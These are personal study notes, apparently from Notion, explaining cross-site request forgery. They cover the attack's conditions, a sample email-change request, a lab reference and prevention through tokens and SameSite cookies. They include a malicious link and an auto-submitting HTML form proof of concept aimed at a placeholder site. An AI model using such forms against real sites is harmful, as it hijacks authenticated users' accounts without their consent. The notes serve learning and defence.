CSRF | Notion

What is it:

tricks user into performing actions on a site where they are authenticated, without their consent.

How attack works:

Victim's Browser: The attacker tricks the victim’s browser into making a request to a web application where the victim is authenticated.
Exploiting Trust: Since the victim is authenticated, the web application processes the request as if it came from the victim.

Example:

The attacker sends a malicious link to the victim. eg → https://vulnerable-website.com/email/change?email=pwned@evil.user.net
When the victim clicks the link, their browser sends a request to the web application, performing an action like changing an email address or making a transaction.

How does CSRF work?

3 conditions must be there:

A relevant action. The attacker aims to induce an action within the application, like modifying permissions or changing a user's password.
Cookie-based session handling. Performing the action involves issuing one or more HTTP requests, and the application uses session cookies to identify the user who has made the requests. There is no other mechanism in place for tracking sessions or validating user requests.
No unpredictable request parameters. Requests performing the action lack parameters that attackers can't guess. For instance, changing a password isn't vulnerable if the attacker needs the current password.

eg : this request to change email address, it matches all 3 conditions
```
POST /email/change HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: session=yvthwsztyeQkAPzeQ5gHgTvlyxHfsAfE

email=wiener@normal-user.com
```
a CSRF PoC can be made for above request, it would look like
```
<html>
    <body>
        <form action="<https://vulnerable-website.com/email/change>" method="POST">
            <input type="hidden" name="email" value="pwned@evil-user.net" />
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>
```
now if the victim visits this page, considering that victim is already logged in in his account on that page. using that session cookies, the browser will automatically use it. and if the page is visited then, the email will be changed.
Lab: CSRF vulnerability with no defenses

Prevention:

CSRF Tokens: Include a unique token in requests that the server validates.
SameSite Cookies: Use the SameSite attribute for cookies to restrict cross-origin requests.
- Strict → best. to restrict everything
- Lax → bad. can be bypassed
- None → worst. does nothing